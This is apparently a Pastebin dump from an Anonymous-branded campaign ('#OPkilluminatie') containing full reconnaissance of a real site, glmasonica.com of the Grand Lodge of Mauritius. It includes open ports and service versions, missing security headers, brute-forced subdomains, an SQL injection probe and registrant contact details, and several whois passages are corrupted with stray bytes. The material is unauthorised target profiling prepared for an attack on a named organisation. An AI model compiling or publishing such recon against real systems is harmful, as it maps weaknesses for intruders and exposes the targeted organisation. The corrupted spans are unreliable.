daily pastebin goal
80%
SHARE
TWEET

Anonymous JTSEC #OPkilluminatie full recon #18

a guest Apr 16th, 2018 2,910 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #######################################################################################################################################
  2. Hostname    www.glmasonica.com      ISP     Savvis (AS3561)
  3. Continent   North America       Flag    
  4. US
  5. Country     United States       Country Code    US (USA)
  6. Region  MA      Local time  15 Apr 2018 21:43 EDT
  7. Metropolis*     Boston          Postal Code     02451
  8. City    Waltham         Latitude    42.403
  9. IP Address  192.252.149.45      Longitude   -71.259
  10. #######################################################################################################################################
  11. HostIP:192.252.149.45
  12. HostName:glmasonica.com
  13.  
  14. Gathered Inet-whois information for 192.252.149.45
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum:        192.251.231.0 - 192.255.255.255
  19. netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  20. descr:          IPv4 address block not managed by the RIPE NCC
  21. remarks:        ------------------------------------------------------
  22. remarks:
  23. remarks:        You can find the whois server to query, or the
  24. remarks:        IANA registry to query on this web page:
  25. remarks:        http://www.iana.org/assignments/ipv4-address-space
  26. remarks:
  27. remarks:        You can access databases of other RIRs at:
  28. remarks:
  29. remarks:        AFRINIC (Africa)
  30. remarks:        http://www.afrinic.net/ whois.afrinic.net
  31. remarks:
  32. remarks:        APNIC (Asia Pacific)
  33. remarks:        http://www.apnic.net/ whois.apnic.net
  34. remarks:
  35. remarks:        ARIN (Northern America)
  36. remarks:        http://www.arin.net/  whois.arin.net
  37. remarks:
  38. remarks:        LACNIC (Latin America and the Carribean)
  39. remarks:        http://www.lacnic.net/ whois.lacnic.net
  40. remarks:
  41. remarks:        IANA IPV4 Recovered Address Space
  42. remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  43. remarks:
  44. remarks:        ------------------------------------------------------
  45. country:        EU # Country is really world wide
  46. admin-c:        IANA1-RIPE
  47. tech-c:         IANA1-RIPE
  48. status:         ALLOCATED UNSPECIFIED
  49. mnt-by:         RIPE-NCC-HM-MNT
  50. mnt-lower:      RIPE-NCC-HM-MNT
  51. mnt-routes:     RIPE-NCC-RPSL-MNT
  52. created:        2018-03-02T09:54:33Z
  53. last-modified:  2018-03-02T09:54:33Z
  54. source:         RIPE
  55.  
  56. role:           Internet Assigned Numbers Authority
  57. address:        see http://www.iana.org.
  58. admin-c:        IANA1-RIPE
  59. tech-c:         IANA1-RIPE
  60. nic-hdl:        IANA1-RIPE
  61. remarks:        For more information on IANA services
  62. remarks:        go to IANA web site at http://www.iana.org.
  63. mnt-by:         RIPE-NCC-MNT
  64. created:        1970-01-01T00:00:00Z
  65. last-modified:  2001-09-22T09:31:27Z
  66. source:         RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.91.1 (WAGYU)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for glmasonica.com
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74.    Domain Name: GLMASONICA.COM
  75.    Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  76.    Registrar WHOIS Server: whois.enom.com
  77.    Registrar URL: http://www.enom.com
  78.    Updated Date: 2018-02-09T11:03:06Z
  79.    Creation Date: 2011-02-11T08:34:04Z
  80.    Registry Expiry Date: 2019-02-11T08:34:04Z
  81.    Registrar: eNom, Inc.
  82.    Registrar IANA ID: 48
  83.    Registrar Abuse Contact Email:
  84.    Registrar Abuse Contact Phone:
  85.    Domain Status: clientTransferProhibited https�U@ed
  86.    Name Server: NS1.SERVER308.COM
  87.    Name Server: NS2.SERVER308.COM
  88.    DNSSEC: unsigned
  89.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  90. >>> Last update of whois database: 2018-04-16T01:46:24Z <<<
  91.  
  92. For more information on Whois status codes, please visit https://icann.org/epp
  93.  
  94. NOTICE: The expiration date displayed in this record is the date the
  95. registrar's sponsorship of the domain name registration in the registry is
  96. currently set to expire. This date does not neceYV@ssariFZA�ly# refle8�'K�ctXV@ the E�'K�exgV@pirat��������ion
  97. date of the domain name registrant's agreement with the sponsoring
  98. registrar.  Users may consult the sponsoring registrar's Whois database to
  99. view the registrar's reported date of expiration for this registration.
  100.  
  101. TERMS OF USE: You are not authorized to access o�U@query�]A� o0ur Who��'K�isU@
  102. database through the use of electronic processes that are high-volume and
  103. automated except as reasonably necessary to register domain names or
  104. modify existing registrations; the Data in VeriSign Global Registry
  105. Services' ("VeriSign") Whois database is provided by VeriSign for
  106. information purposes only, and to assist persons in obtaining information
  107. about or related to a domain name registration record. VeriSign does not
  108. guarantee its accuracy. By submitting a Whois qu�U@you a�]A�gr�ee to ��'K�abU@ide
  109. by the following terms of use: You agree that you may use this Data only
  110. for lawful purposes and that under no circumstances will you use this Data
  111. to: (1) allow, enable, or otherwise support the transmission of mass
  112. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  113. or facsimile; or (2) enable high volume, automated, electronic processes
  114. that apply to VeriSign (or its computer systems). The compilation,
  115. repackaging, dissemination or other use of this �U@Data �]A�is� expre7�'K�ssU@ly
  116. prohibited without the prior written consent of VeriSign. You agree not to
  117. use electronic processes that are automated and high-volume to access or
  118. query the Whois database except as reasonably necessary to register
  119. domain names or modify existing registrations. VeriSign reserves the right
  120. to restrict your access to the Whois database in its sole discretion to ensure
  121. operational stability.  VeriSign may restrict or terminate your access to the
  122. Whois database for failure to abide by these ter�U@ms of�]A� use. Ver̷'K�iSU@ign
  123. reserves the right to modify these terms at any time.
  124.  
  125. The Registry database contains ONLY .COM, .NET, .EDU domains and
  126. Registrars.
  127.  
  128. Gathered Netcraft information for glmasonica.com
  129. ---------------------------------------------------------------------------------------------------------------------------------------
  130.  
  131. Retrieving Netcraft.com information for glmasonica.com
  132. Netcraft.com Information gathered
  133.  
  134. Gathered Subdomain information for glmasonica.com
  135. --------------------------------------------------------------------------------------------------------------------------------------
  136. Searching Google.com:80...
  137. HostName:www.glmasonica.com
  138. HostIP:192.252.149.45
  139. Searching Altavista.com:80...
  140. Found 1 possible subdomain(s) for host glmasonica.com, Searched 0 pages containing 0 results
  141.  
  142. Gathered E-Mail information for glmasonica.com
  143. ---------------------------------------------------------------------------------------------------------------------------------------
  144. Searching Google.com:80...
  145. Searching Altavista.com:80...
  146. Found 0 E-Mail(s) for host glmasonica.com, Searched 0 pages containing 0 results
  147.  
  148. Gathered TCP Port information for 192.252.149.45
  149. ---------------------------------------------------------------------------------------------------------------------------------------
  150.  
  151.  Port       State
  152.  
  153. 21/tcp      open
  154. 22/tcp      open
  155. 80/tcp      open
  156. 143/tcp     open
  157.  
  158. Portscan Finished: Scanned 150 ports, 0 ports were in state closed
  159. #######################################################################################################################################
  160. [i] Scanning Site: http://glmasonica.com
  161.  
  162.  
  163.  
  164. B A S I C   I N F O
  165. =======================================================================================================================================
  166.  
  167.  
  168. [+] Site Title: Grande Loge De Maurice
  169. [+] IP address: 192.252.149.45
  170. [+] Web Server: Apache
  171. [+] CMS: Could Not Detect
  172. [+] Cloudflare: Not Detected
  173. [+] Robots File: Could NOT Find robots.txt!
  174.  
  175.  
  176.  
  177.  
  178. W H O I S   L O O K U P
  179. =======================================================================================================================================
  180.  
  181.        Domain Name: GLMASONICA.COM
  182.    Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  183.    Registrar WHOIS Server: whois.enom.com
  184.    Registrar URL: http://www.enom.com
  185.    Updated Date: 2018-02-09T11:03:06Z
  186.    Creation Date: 2011-02-11T08:34:04Z
  187.    Registry Expiry Date: 2019-02-11T08:34:04Z
  188.    Registrar: eNom, Inc.
  189.    Registrar IANA ID: 48
  190.    Registrar Abuse Contact Email:
  191.    Registrar Abuse Contact Phone:
  192.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  193.    Name Server: NS1.SERVER308.COM
  194.    Name Server: NS2.SERVER308.COM
  195.    DNSSEC: unsigned
  196.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  197. >>> Last update of whois database: 2018-04-16T01:46:24Z <<<
  198.  
  199. For more information on Whois status codes, please visit https://icann.org/epp
  200.  
  201.  
  202.  
  203. The Registry database contains ONLY .COM, .NET, .EDU domains and
  204. Registrars.
  205.  
  206.  
  207.  
  208.  
  209. G E O  I P  L O O K  U P
  210. =======================================================================================================================================
  211.  
  212. [i] IP Address: 192.252.149.45
  213. [i] Country: US
  214. [i] State: Massachusetts
  215. [i] City: Waltham
  216. [i] Latitude: 42.403000
  217. [i] Longitude: -71.259003
  218.  
  219.  
  220.  
  221.  
  222. H T T P   H E A D E R S
  223. =======================================================================================================================================
  224.  
  225.  
  226. [i]  HTTP/1.1 200 OK
  227. [i]  Date: Mon, 16 Apr 2018 01:46:40 GMT
  228. [i]  Server: Apache
  229. [i]  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  230. [i]  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  231. [i]  Pragma: no-cache
  232. [i]  Set-Cookie: projector=13fe947520f28f594bf9d7e975093f0c; path=/
  233. [i]  Connection: close
  234. [i]  Content-Type: text/html
  235.  
  236.  
  237.  
  238.  
  239. D N S   L O O K U P
  240. =======================================================================================================================================
  241.  
  242. ;; Truncated, retrying in TCP mode.
  243. glmasonica.com.     2560    IN  SOA ns1.server308.com. hostmaster.glmasonica.com. 1523828373 16384 2048 1048576 2560
  244. glmasonica.com.     25920   IN  NS  ns1.server308.com.
  245. glmasonica.com.     25920   IN  NS  ns2.server308.com.
  246. glmasonica.com.     14400   IN  MX  0 mail.glmasonica.com.
  247. glmasonica.com.     14400   IN  A   192.252.149.45
  248.  
  249.  
  250.  
  251.  
  252. S U B N E T   C A L C U L A T I O N
  253. =======================================================================================================================================
  254.  
  255. Address       = 192.252.149.45
  256. Network       = 192.252.149.45 / 32
  257. Netmask       = 255.255.255.255
  258. Broadcast     = not needed on Point-to-Point links
  259. Wildcard Mask = 0.0.0.0
  260. Hosts Bits    = 0
  261. Max. Hosts    = 1   (2^0 - 0)
  262. Host Range    = { 192.252.149.45 - 192.252.149.45 }
  263.  
  264.  
  265.  
  266. N M A P   P O R T   S C A N
  267. =======================================================================================================================================
  268.  
  269.  
  270. Starting Nmap 7.01 ( https://nmap.org ) at 2018-04-16 01:46 UTC
  271. Nmap scan report for glmasonica.com (192.252.149.45)
  272. Host is up (0.015s latency).
  273. PORT     STATE    SERVICE       VERSION
  274. 21/tcp   open     ftp           ProFTPD
  275. 22/tcp   open     ssh           OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
  276. 23/tcp   filtered telnet
  277. 25/tcp   open     smtp          netqmail smtpd 1.04
  278. 80/tcp   open     http          Apache httpd
  279. 110/tcp  open     pop3          Dovecot pop3d
  280. 143/tcp  open     imap          Dovecot imapd
  281. 443/tcp  open     ssl/ssl       Apache httpd (SSL-only mode)
  282. 445/tcp  filtered microsoft-ds
  283. 3389/tcp filtered ms-wbt-server
  284. Service Info: Host: 192.252.149.45; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  285.  
  286. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  287. Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds
  288.  
  289. #######################################################################################################################################
  290. <pre><font color="#FCE94F"><b>[!]</b></font> IP Address : 192.252.149.45
  291. <font color="#FCE94F"><b>[!]</b></font> Server: Apache
  292. <font color="#8AE234"><b>[+]</b></font> Clickjacking protection is not in place.
  293. <font color="#8AE234"><b>[+]</b></font> Operating System : Debian&amp;#34;
  294.   },
  295.   &amp;#34;993&amp;#34;: {
  296.     &amp;#34;imaps&amp;#34;: {
  297.       &amp;#34;tls&amp;#34;: {
  298.         &amp;#34;tls&amp;#34;: {
  299.           &amp;#34;server_key_exchange&amp;#34;: {
  300.             &amp;#34;ecdh_params&amp;#34;: {
  301.               &amp;#34;curve_id&amp;#34;: {
  302.                 &amp;#34;id&amp;#34;: 23,
  303.                 &amp;#34;name&amp;#34;: &amp;#34;secp256r1&amp;#34;
  304.               }
  305.             }
  306.           },
  307.           &amp;#34;certificate&amp;#34;: {
  308.             &amp;#34;parsed&amp;#34;: {
  309.               &amp;#34;fingerprint_sha1&amp;#34;: &amp;#34;5e5415f6edece4cb2c1913c05b07a33a89fbb4d0&amp;#34;,
  310.               &amp;#34;tbs_noct_fingerprint&amp;#34;: &amp;#34;cab5cdc850c8153ea3bc4a1b31f2d48b54af1dfd6f4228c1233652effbba14a9&amp;#34;,
  311.               &amp;#34;subj
  312. <font color="#FCE94F"><b>[!]</b></font> www.glmasonica.com doesn&apos;t seem to use a CMS
  313. <font color="#8AE234"><b>[+]</b></font> Honeypot Probabilty: 30%
  314. <font color="#EF2929"><b>----------------------------------------</b></font>
  315. <font color="#EEEEEC"><b>[~]</b></font> Trying to gather whois information for www.glmasonica.com
  316. <font color="#8AE234"><b>[+]</b></font> Whois information found
  317. <font color="#EF2929"><b>[-]</b></font> Unable to build response, visit https://who.is/whois/www.glmasonica.com
  318. <font color="#EF2929"><b>----------------------------------------</b></font>
  319. PORT     STATE    SERVICE       VERSION
  320. 21/tcp   open     ftp           ProFTPD
  321. 22/tcp   open     ssh           OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
  322. 23/tcp   filtered telnet
  323. 25/tcp   open     smtp          netqmail smtpd 1.04
  324. 80/tcp   open     http          Apache httpd
  325. 110/tcp  open     pop3          Dovecot pop3d
  326. 143/tcp  open     imap          Dovecot imapd
  327. 443/tcp  open     ssl/http      Apache httpd
  328. 445/tcp  filtered microsoft-ds
  329. 3389/tcp filtered ms-wbt-server
  330. <font color="#EF2929"><b>----------------------------------------</b></font>
  331.  
  332. <font color="#8AE234"><b>[+]</b></font> DNS Records
  333.  
  334. <font color="#8AE234"><b>[+]</b></font> Host Records (A)
  335. www.glmasonica.comHTTP: (192.252.149.45) AS3561 Savvis United States
  336.  
  337. <font color="#8AE234"><b>[+]</b></font> TXT Records
  338.  
  339. <font color="#8AE234"><b>[+]</b></font> DNS Map: https://dnsdumpster.com/static/map/glmasonica.com.png
  340.  
  341. <font color="#EEEEEC"><b>[&gt;]</b></font> Initiating 3 intel modules
  342. <font color="#EEEEEC"><b>[&gt;]</b></font> Loading Alpha module (1/3)
  343. <font color="#EEEEEC"><b>[&gt;]</b></font> Beta module deployed (2/3)
  344. <font color="#EEEEEC"><b>[&gt;]</b></font> Gamma module initiated (3/3)
  345.  
  346.  
  347. [+] Emails found:
  348. ------------------
  349. pixel-1523843228738161-web-@www.glmasonica.com
  350. pixel-1523843231359027-web-@www.glmasonica.com
  351. No hosts found
  352. [+] Virtual hosts:
  353. -----------------
  354. <font color="#EEEEEC"><b>[~]</b></font> Crawling the target for fuzzable URLs
  355. <font color="#8AE234"><b>[+]</b></font> Found 2 fuzzable URLs
  356. http://www.glmasonica.com//introduction.php?l=fr
  357. <font color="#EEEEEC"><b>[~]</b></font> Using SQLMap api to check for SQL injection vulnerabilities. Don&apos;t worry we are using an online service and it doesn&apos;t depend on your internet connection. This scan will take 2-3 minutes.
  358. <font color="#EF2929"><b>[-]</b></font> None of parameters is vulnerable to SQL injection
  359. <font color="#8AE234"><b>[+]</b></font> These are the URLs having parameters:
  360. http://www.glmasonica.com//introduction.php?l=fr
  361. http://www.glmasonica.com//introduction.php?l=en
  362. </pre>
  363. #######################################################################################################################################
  364. [*] Processing domain glmasonica.com
  365. [+] Getting nameservers
  366. 192.252.150.21 - ns2.server308.com
  367. 192.252.149.21 - ns1.server308.com
  368. [-] Zone transfer failed
  369.  
  370. [+] MX records found, added to target list
  371. 0 mail.glmasonica.com.
  372.  
  373. [+] Wildcard domain found - 192.252.149.45
  374. [*] Scanning glmasonica.com for A records
  375. #######################################################################################################################################
  376. Original*      glmasonica.com     192.252.149.45 NS:ns1.server308.com MX:mail.glmasonica.com
  377. Subdomain      gl.masonica.com    207.148.248.143
  378. Subdomain      glm.asonica.com    66.96.132.120
  379. Subdomain      glma.sonica.com    208.91.197.27
  380. #######################################################################################################################################
  381. Ip Address  Status  Type    Domain Name         Server
  382. ----------  ------  ----    -----------         ------
  383. 192.252.149.45  400     host    ftp_.glmasonica.com     Apache
  384. 192.252.149.45          host    mta.glmasonica.com     
  385. 192.252.149.45          host    mtu.glmasonica.com     
  386. 192.252.149.45          host    mu.glmasonica.com      
  387. 192.252.149.45          host    multimedia.glmasonica.com  
  388. 192.252.149.45          host    music.glmasonica.com       
  389. 192.252.149.45          host    mv.glmasonica.com      
  390. 192.252.149.45          host    mw.glmasonica.com      
  391. 192.252.149.45          host    mx.glmasonica.com      
  392. 192.252.149.45          host    mx1.glmasonica.com     
  393. 192.252.149.45          host    my.glmasonica.com      
  394. 192.252.149.45          host    mysql.glmasonica.com       
  395. 192.252.149.45          host    mysql0.glmasonica.com      
  396. 192.252.149.45          host    mysql01.glmasonica.com     
  397. 192.252.149.45  400     host    ns_.glmasonica.com      Apache
  398. 192.252.149.45          host    problemtracker.glmasonica.com  
  399. 192.252.149.45          host    products.glmasonica.com    
  400. 192.252.149.45          host    profiles.glmasonica.com    
  401. 192.252.149.45          host    project.glmasonica.com     
  402. 192.252.149.45          host    projects.glmasonica.com    
  403. 192.252.149.45          host    promo.glmasonica.com       
  404. 192.252.149.45          host    prueba.glmasonica.com      
  405. 192.252.149.45          host    pruebas.glmasonica.com     
  406. 192.252.149.45          host    ps.glmasonica.com      
  407. 192.252.149.45          host    psi.glmasonica.com     
  408. 192.252.149.45          host    pss.glmasonica.com     
  409. 192.252.149.45          host    pt.glmasonica.com      
  410. 192.252.149.45          host    pub.glmasonica.com     
  411. 192.252.149.45          host    public.glmasonica.com      
  412. 192.252.149.45          host    pubs.glmasonica.com    
  413. 192.252.149.45          host    purple.glmasonica.com      
  414. 192.252.149.45          host    read.glmasonica.com    
  415. 192.252.149.45          host    realserver.glmasonica.com  
  416. 192.252.149.45          host    recruiting.glmasonica.com  
  417. 192.252.149.45          host    red.glmasonica.com     
  418. 192.252.149.45          host    redhat.glmasonica.com      
  419. 192.252.149.45          host    ref.glmasonica.com     
  420. 192.252.149.45          host    reference.glmasonica.com   
  421. 192.252.149.45          host    reg.glmasonica.com     
  422. 192.252.149.45          host    register.glmasonica.com    
  423. 192.252.149.45          host    rtr.glmasonica.com     
  424. 192.252.149.45          host    rtr1.glmasonica.com    
  425. 192.252.149.45          host    ru.glmasonica.com      
  426. 192.252.149.45          host    s1.glmasonica.com      
  427. 192.252.149.45          host    s2.glmasonica.com      
  428. 192.252.149.45          host    sa.glmasonica.com      
  429. 192.252.149.45          host    sac.glmasonica.com     
  430. 192.252.149.45          host    sacramento.glmasonica.com  
  431. 192.252.149.45  302     host    webmail.glmasonica.com      Apache
  432. 192.252.149.45  200     host    www.glmasonica.com      Apache
  433. 192.252.149.45  400     host    www_.glmasonica.com     Apache
  434. ######################################################################################################################################
  435. -------------------------------------------------------------------------------------------------------------------------------------
  436. + Target IP:          192.252.149.45
  437. + Target Hostname:    glmasonica.com
  438. + Target Port:        80
  439. + Start Time:         2018-04-15 22:09:38 (GMT-4)
  440. ---------------------------------------------------------------------------------------------------------------------------------------
  441. + Server: Apache
  442. + Cookie projector created without the httponly flag
  443. + The anti-clickjacking X-Frame-Options header is not present.
  444. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  445. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  446. + Uncommon header 'tcn' found, with contents: choice
  447. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  448. + ERROR: Error limit (20) reached for host, giving up. Last error:
  449. + Scan terminated:  0 error(s) and 6 item(s) reported on remote host
  450. + End Time:           2018-04-15 22:23:52 (GMT-4) (854 seconds)
  451. ---------------------------------------------------------------------------------------------------------------------------------------
  452. + 1 host(s) tested
  453. #######################################################################################################################################
  454. Server:     10.211.254.254
  455. Address:    10.211.254.254#53
  456.  
  457. Non-authoritative answer:
  458. Name:   glmasonica.com
  459. Address: 192.252.149.45
  460.  
  461. glmasonica.com has address 192.252.149.45
  462. glmasonica.com mail is handled by 0 mail.glmasonica.com.
  463. #######################################################################################################################################
  464. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  465.  
  466. [+] Target is glmasonica.com
  467. [+] Loading modules.
  468. [+] Following modules are loaded:
  469. [x] [1] ping:icmp_ping  -  ICMP echo discovery module
  470. [x] [2] ping:tcp_ping  -  TCP-based ping discovery module
  471. [x] [3] ping:udp_ping  -  UDP-based ping discovery module
  472. [x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
  473. [x] [5] infogather:portscan  -  TCP and UDP PortScanner
  474. [x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
  475. [x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
  476. [x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
  477. [x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
  478. [x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
  479. [x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
  480. [x] [12] fingerprint:smb  -  SMB fingerprinting module
  481. [x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
  482. [+] 13 modules registered
  483. [+] Initializing scan engine
  484. [+] Running scan engine
  485. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.252.149.45. Module test failed
  486. [-] ping:udp_ping module: no closed/open UDP ports known on 192.252.149.45. Module test failed
  487. [-] No distance calculation. 192.252.149.45 appears to be dead or no ports known
  488. [+] Host: 192.252.149.45 is up (Guess probability: 50%)
  489. [+] Target: 192.252.149.45 is alive. Round-Trip Time: 0.47967 sec
  490. [+] Selected safe Round-Trip Time value is: 0.95934 sec
  491. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  492. [-] fingerprint:smb need either TCP port 139 or 445 to run
  493. [+] Primary guess:
  494. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  495. [+] Other guesses:
  496. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  497. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  498. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  499. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  500. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  501. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  502. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  503. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  504. [+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
  505. [+] Cleaning up scan engine
  506. [+] Modules deinitialized
  507. [+] Execution completed.
  508. #######################################################################################################################################
  509.    Domain Name: GLMASONICA.COM
  510.    Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  511.    Registrar WHOIS Server: whois.enom.com
  512.    Registrar URL: http://www.enom.com
  513.    Updated Date: 2018-02-09T11:03:06Z
  514.    Creation Date: 2011-02-11T08:34:04Z
  515.    Registry Expiry Date: 2019-02-11T08:34:04Z
  516.    Registrar: eNom, Inc.
  517.    Registrar IANA ID: 48
  518.    Registrar Abuse Contact Email:
  519.    Registrar Abuse Contact Phone:
  520.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  521.    Name Server: NS1.SERVER308.COM
  522.    Name Server: NS2.SERVER308.COM
  523.    DNSSEC: unsigned
  524.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  525. >>> Last update of whois database: 2018-04-16T02:31:28Z <<<
  526.  
  527. For more information on Whois status codes, please visit https://icann.org/epp
  528.  
  529. NOTICE: The expiration date displayed in this record is the date the
  530. registrar's sponsorship of the domain name registration in the registry is
  531. currently set to expire. This date does not necessarily reflect the expiration
  532. date of the domain name registrant's agreement with the sponsoring
  533. registrar.  Users may consult the sponsoring registrar's Whois database to
  534. view the registrar's reported date of expiration for this registration.
  535.  
  536. TERMS OF USE: You are not authorized to access or query our Whois
  537. database through the use of electronic processes that are high-volume and
  538. automated except as reasonably necessary to register domain names or
  539. modify existing registrations; the Data in VeriSign Global Registry
  540. Services' ("VeriSign") Whois database is provided by VeriSign for
  541. information purposes only, and to assist persons in obtaining information
  542. about or related to a domain name registration record. VeriSign does not
  543. guarantee its accuracy. By submitting a Whois query, you agree to abide
  544. by the following terms of use: You agree that you may use this Data only
  545. for lawful purposes and that under no circumstances will you use this Data
  546. to: (1) allow, enable, or otherwise support the transmission of mass
  547. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  548. or facsimile; or (2) enable high volume, automated, electronic processes
  549. that apply to VeriSign (or its computer systems). The compilation,
  550. repackaging, dissemination or other use of this Data is expressly
  551. prohibited without the prior written consent of VeriSign. You agree not to
  552. use electronic processes that are automated and high-volume to access or
  553. query the Whois database except as reasonably necessary to register
  554. domain names or modify existing registrations. VeriSign reserves the right
  555. to restrict your access to the Whois database in its sole discretion to ensure
  556. operational stability.  VeriSign may restrict or terminate your access to the
  557. Whois database for failure to abide by these terms of use. VeriSign
  558. reserves the right to modify these terms at any time.
  559.  
  560. The Registry database contains ONLY .COM, .NET, .EDU domains and
  561. Registrars.
  562.  
  563.  
  564. Domain Name: GLMASONICA.COM
  565. Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
  566. Registrar WHOIS Server: whois.enom.com
  567. Registrar URL: www.enom.com
  568. Updated Date: 2018-02-06T04:16:52.00Z
  569. Creation Date: 2011-02-11T08:34:00.00Z
  570. Registrar Registration Expiration Date: 2019-02-11T08:34:04.00Z
  571. Registrar: ENOM, INC.
  572. Registrar IANA ID: 48
  573. Reseller: SURESUPPORT.COM
  574. Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
  575. Registry Registrant ID:
  576. Registrant Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
  577. Registrant Organization: GRAND LODGE OF MAURITIUS
  578. Registrant Street: BARACHOIS ESTATE
  579. Registrant Street: NA
  580. Registrant City: TAMARIN
  581. Registrant State/Province: NA
  582. Registrant Postal Code: 0000
  583. Registrant Country: MU
  584. Registrant Phone: +230.4834439
  585. Registrant Phone Ext:
  586. Registrant Fax:
  587. Registrant Fax Ext:
  588. Registrant Email: INFO@IMSMAURITIUS.COM
  589. Registry Admin ID:
  590. Admin Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
  591. Admin Organization: GRAND LODGE OF MAURITIUS
  592. Admin Street: BARACHOIS ESTATE
  593. Admin Street: NA
  594. Admin City: TAMARIN
  595. Admin State/Province: NA
  596. Admin Postal Code: 0000
  597. Admin Country: MU
  598. Admin Phone: +230.4834439
  599. Admin Phone Ext:
  600. Admin Fax:
  601. Admin Fax Ext:
  602. Admin Email: INFO@IMSMAURITIUS.COM
  603. Registry Tech ID:
  604. Tech Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
  605. Tech Organization: GRAND LODGE OF MAURITIUS
  606. Tech Street: BARACHOIS ESTATE
  607. Tech Street: NA
  608. Tech City: TAMARIN
  609. Tech State/Province: NA
  610. Tech Postal Code: 0000
  611. Tech Country: MU
  612. Tech Phone: +230.4834439
  613. Tech Phone Ext:
  614. Tech Fax:
  615. Tech Fax Ext:
  616. Tech Email: INFO@IMSMAURITIUS.COM
  617. Name Server: NS1.SERVER308.COM
  618. Name Server: NS2.SERVER308.COM
  619. DNSSEC: unSigned
  620. Registrar Abuse Contact Email: abuse@enom.com
  621. Registrar Abuse Contact Phone: +1.4259744689
  622. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  623. >>> Last update of WHOIS database: 2018-02-06T04:16:52.00Z <<<
  624.  
  625. For more information on Whois status codes, please visit https://icann.org/epp
  626.  
  627.  
  628. The data in this whois database is provided to you for information
  629. purposes only, that is, to assist you in obtaining information about or
  630. related to a domain name registration record. We make this information
  631. available "as is," and do not guarantee its accuracy. By submitting a
  632. whois query, you agree that you will use this data only for lawful
  633. purposes and that, under no circumstances will you use this data to: (1)
  634. enable high volume, automated, electronic processes that stress or load
  635. this whois database system providing you this information; or (2) allow,
  636. enable, or otherwise support the transmission of mass unsolicited,
  637. commercial advertising or solicitations via direct mail, electronic
  638. mail, or by telephone. The compilation, repackaging, dissemination or
  639. other use of this data is expressly prohibited without prior written
  640. consent from us.  
  641.  
  642. We reserve the right to modify these terms at any time. By submitting
  643. this query, you agree to abide by these terms.
  644. Version 6.3 4/3/2002
  645.  
  646. Get Noticed on the Internet!  Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com
  647. #######################################################################################################################################
  648.  
  649. ; <<>> DiG 9.11.3-1-Debian <<>> -x glmasonica.com
  650. ;; global options: +cmd
  651. ;; Got answer:
  652. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42747
  653. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  654.  
  655. ;; OPT PSEUDOSECTION:
  656. ; EDNS: version: 0, flags:; udp: 4096
  657. ;; QUESTION SECTION:
  658. ;com.glmasonica.in-addr.arpa.   IN  PTR
  659.  
  660. ;; AUTHORITY SECTION:
  661. in-addr.arpa.       604 IN  SOA b.in-addr-servers.arpa. nstld.iana.org. 2018013344 1800 900 604800 3600
  662.  
  663. ;; Query time: 404 msec
  664. ;; SERVER: 10.211.254.254#53(10.211.254.254)
  665. ;; WHEN: Sun Apr 15 22:31:47 EDT 2018
  666. ;; MSG SIZE  rcvd: 124
  667.  
